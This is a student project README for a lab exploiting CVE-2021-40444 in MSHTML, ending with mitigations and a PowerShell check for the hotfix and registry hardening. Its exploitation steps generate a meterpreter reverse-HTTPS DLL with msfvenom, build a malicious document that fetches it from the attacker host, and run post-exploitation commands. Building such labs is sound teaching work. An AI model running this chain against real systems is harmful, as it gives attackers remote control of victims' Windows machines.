## https://sploitus.com/exploit?id=111C9F44-593D-5E56-8040-615B48ED3E24
# TIC4301_Project
TIC4301 Project - CVE-2021-40444

Download the following vagrant boxes: \
Kali  -  https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing \
Win10 -  https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing

Import the boxes with the following commands through vagrant:
1. `vagrant box add kali kali_package.box`
2. `vagrant box add victim victim_package.box`
3. `vagrant init kali_package.box`
4. `vagrant init victim_package.box`
5. `vagrant up`

Setup (win10):
1. In the win10 box, log in as administrator with the password `vagrant`.
2. Right-click `script.ps1` on the desktop and run it with PowerShell. (Leave this open.)
3. Run `ipconfig.exe` and obtain the address for this host.

Setup & Exploitation (Kali):
1. `cd Desktop/CVE-2021-40444`
2. Generate your malicious DLL with msfvenom: `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll`
3. Start a listener in Metasploit.
4. Generate the malicious document: `python3 exploit.py generate test/shell.dll http://172.28.128.4` (the Kali IP).
5. Run `sudo python3 exploit.py host 80` to host your server for the file downloads.
6. Visit `http://<win 10 IP>/upload` and upload the file.
7. Listen for the shell.

Further Exploitation:
1. `run post/windows/manage/migrate` (meterpreter)
2. `shell` (meterpreter)
  
Mitigations:
1. Install the KB5005565 hotfix.
2. Edit the Windows registry with `patch.reg` in the repository.
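
To confirm that both mitigations took effect on the win10 box, the following check can be run in PowerShell. It is an added example, not part of the original repository. It assumes `patch.reg` applies Microsoft's published workaround for CVE-2021-40444 (URL actions 1001 and 1004 set to 3 in Internet Explorer zones 0 to 3); the function name `Test-Cve202140444Mitigation` is hypothetical.

```powershell
# Added example: verify the two mitigations on the Windows 10 lab host.
# Assumption: patch.reg sets URL actions 1001 (download signed ActiveX) and
# 1004 (download unsigned ActiveX) to 3 (disable) under the policy key for
# zones 0-3 (Local Machine, Intranet, Trusted, Internet).

function Test-Cve202140444Mitigation {
    [CmdletBinding()]
    param(
        [string]$HotfixId  = 'KB5005565',
        [string]$ZonesRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
    )

    # Mitigation 1: is the hotfix listed? A later cumulative update supersedes
    # this KB, so a miss here means "check the OS build", not "unpatched".
    $hotfix = Get-HotFix -Id $HotfixId -ErrorAction SilentlyContinue

    # Mitigation 2: collect every zone/action pair that is missing or not 3.
    $gaps = foreach ($zone in 0..3) {
        foreach ($action in '1001', '1004') {
            $path  = Join-Path $ZonesRoot $zone
            $value = (Get-ItemProperty -Path $path -Name $action -ErrorAction SilentlyContinue).$action
            if ($value -ne 3) {
                [pscustomobject]@{ Zone = $zone; Action = $action; Found = $value }
            }
        }
    }

    [pscustomobject]@{
        HotfixInstalled  = [bool]$hotfix
        RegistryHardened = -not $gaps
        RegistryGaps     = @($gaps)
    }
}

$result = Test-Cve202140444Mitigation
$result | Format-List HotfixInstalled, RegistryHardened
$result.RegistryGaps | Format-Table -AutoSize
```

An empty `RegistryGaps` table means every zone has both ActiveX install actions disabled; any row shows the zone and action that still needs the registry change.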